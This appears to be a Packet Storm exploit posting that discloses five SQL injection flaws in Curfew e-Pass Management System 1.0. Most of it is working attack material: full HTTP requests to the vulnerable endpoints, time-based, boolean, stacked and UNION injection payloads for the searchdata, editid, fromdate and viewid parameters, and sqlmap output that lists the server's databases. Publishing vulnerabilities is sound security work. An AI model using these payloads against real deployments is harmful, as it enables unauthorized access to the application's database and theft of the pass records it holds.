what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Curfew e-Pass Management System 1.0 SQL Injection

Curfew e-Pass Management System 1.0 SQL Injection
Posted Aug 6, 2020
Authored by Mucahit Karadag

Curfew e-Pass Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to gh1mau.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | 02ec0bb1649cf997b05a017aed698bf8edd9fdefbef3abbf9e50334a94facc84

Curfew e-Pass Management System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Curfew e-Pass Management System 1.0 Multiple SQL Injection Vulnerabilities
# Google Dork: N/A
# Date: 04.08.2020
# Exploit Author: Mucahit Karadag
# Vendor Homepage: https://products.phpgurukul.com/product/curfew-e-pass-management-system-project-report/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=11661
# Version: 1.0
# Tested on: Ubuntu Server 14.04.6 LTS
# CVE : N/A

###
# Software Description:
# Curfew Pass Management system is a web-based technology that will manage
# the records of pass which issue by administrative. Curfew Pass Management
# System is an automatic system that delivers data processing at a very high
# speed in a systematic manner.
#
# Vulnerabilitiy Description:
# Curfew e-Pass Management System 1.0 web application is vulnerable to
# 5 different SQL injection vulnerabilities in multiple endpoints.
# Vulnerabilities are listed in detail below.
#
# In summary, vulnerabilities are
# Unauthenticated SQL Injection Identified on searchdata Parameter
# Authenticated SQL Injection Identified on editid Parameter
# Authenticated SQL Injection Identified on fromdate Parameter
# Authenticated SQL Injection Identified on searchdata Parameter
# Authenticated SQL Injection Identified on viewid Parameter
###

##
## [Unauthenticated SQL Injection Identified on searchdata Parameter]
##

POST /cpms/index.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/index.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

searchdata=&search=

"searchdata" parameter is vulnerable to SQL injection under the search feature in the main page.

Parameter: searchdata (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=asd' AND (SELECT 1646 FROM (SELECT(SLEEP(5)))qasT) AND 'hZfX'='hZfX&search=

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: searchdata=asd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x624a58537255484d436f537963554473417772544758624364725249617a63534a564271704b756d,0x71766a6271),NULL,NULL,NULL,NULL-- -&search=
---
[09:52:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[09:52:10] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

##
## [Authenticated SQL Injection Identified on editid Parameter]
##

GET /cpms/admin/edit-category-detail.php?editid=1 HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/manage-category.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1


"editid" parameter is vulnerable to SQL injection on HTTP GET rquest to /admin/edit-category-detail.php endpoint.

---
Parameter: editid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: editid=1 AND 4435=4435

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: editid=1;SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: editid=1 AND (SELECT 2111 FROM (SELECT(SLEEP(5)))TtYi)

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: editid=1 UNION ALL SELECT NULL,CONCAT(0x7176707871,0x5a4e55767242794d476c47766f765a4a62704b54775074624e684745515a59626662504d46726f4a,0x716a6b7071),NULL-- -
---
[09:54:59] [INFO] testing MySQL
[09:54:59] [INFO] confirming MySQL
[09:54:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:54:59] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

##
## [Authenticated SQL Injection Identified on fromdate Parameter]
##

POST /cpms/admin/pass-bwdates-reports-details.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/pass-bwdates-report.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

fromdate=2020-08-04&todate=2020-08-26&submit=

---
Parameter: fromdate (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-08-02' AND (SELECT 6843 FROM (SELECT(SLEEP(5)))eIgq) AND 'Vnjn'='Vnjn&todate=2020-08-27&submit=
---
[09:58:36] [INFO] testing MySQL
[09:58:36] [INFO] confirming MySQL
[09:58:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:58:36] [INFO] fetching database names
[09:58:36] [INFO] fetching number of databases
[09:58:36] [INFO] resumed: 5
[09:58:36] [INFO] resuming partial value: informat
[09:58:36] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[09:58:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[09:58:56] [INFO] adjusting time delay to 1 second due to good response times
[09:59:37] [INFO] retrieved: cpms
[09:59:37] [INFO] retrieved: information_schema
[10:00:56] [INFO] retrieved: mysql
[10:02:25] [INFO] retrieved: performance_schema
[10:03:41] [INFO] retrieved: phpmyadmin
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

##
## [Authenticated SQL Injection Identified on searchdata Parameter]
##

POST /cpms/admin/search-pass.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/search-pass.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

searchdata=asd&search=

---
Parameter: searchdata (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=123123123' AND (SELECT 8177 FROM (SELECT(SLEEP(5)))Hojp) AND 'vmxB'='vmxB&search=

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: searchdata=123123123' UNION ALL SELECT NULL,NULL,CONCAT(0x7162786a71,0x7174545a63634a4b774a7561487a75456a4b4f55554b6e57704f6342514a744e4643534d43724c56,0x717a6a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&search=
---
[10:10:57] [INFO] testing MySQL
[10:10:57] [WARNING] reflective value(s) found and filtering out
[10:10:57] [INFO] confirming MySQL
[10:10:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[10:10:58] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin


##
## [Authenticated SQL Injection Identified on viewid Parameter]
##

GET /cpms/admin/view-pass-detail.php?viewid=3 HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

---
Parameter: viewid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: viewid=3 AND 2054=2054

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: viewid=3 AND (SELECT 1904 FROM (SELECT(SLEEP(5)))VWYW)

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: viewid=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787871,0x6c566b51504651727a68446f5077707646555a444466646c427470556b514e704179774e6b787661,0x71766a7871),NULL-- -
---
[10:12:27] [INFO] testing MySQL
[10:12:27] [INFO] confirming MySQL
[10:12:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[10:12:28] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close